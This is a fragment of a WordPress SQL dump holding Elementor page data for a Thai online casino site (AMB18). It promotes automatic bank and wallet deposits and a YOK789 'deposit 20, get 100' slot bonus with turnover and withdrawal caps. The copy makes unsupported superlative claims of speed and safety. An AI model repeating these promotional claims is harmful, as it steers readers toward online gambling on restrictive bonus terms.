\\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e40\\u0e25\\u0e34\\u0e1f\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e08\\u0e30\\u0e40\\u0e15\\u0e34\\u0e21\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e40\\u0e15\\u0e34\\u0e21\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e08\\u0e31\\u0e14\\u0e01\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e41\\u0e04\\u0e48\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e27\\u0e34\\u0e48\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e41\\u0e1a\\u0e1a\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25 \\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp\",\"id\":345,\"size\":\"\",\"alt\":\"\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c AMB18 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>AMB18\\u00a0<\\/b>\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u00a0<\\/strong><\\/span><b><u>AMB18<\\/u><\\/b><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><span style=\\\"color: #ffcc00;\\\"><b>\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 AMB18 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/b><\\/span><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3023,402,'_thumbnail_id','345'),(3026,29,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:5:\"align\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:1:{s:5:\"width\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}}}}'),(3029,347,'_wp_attachment_image_alt','โปรโมชั่น'),(3030,403,'_elementor_edit_mode','builder'),(3031,403,'_elementor_template_type','wp-page'),(3032,403,'_elementor_version','3.35.5'),(3033,403,'_elementor_pro_version','3.32.3'),(3034,403,'_wp_page_template','default'),(3035,403,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3036,403,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 YOK789 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e08\\u0e32\\u0e01 YOK789 \\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30 \\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e23\\u0e48\\u0e27\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01\\u0e22\\u0e34\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 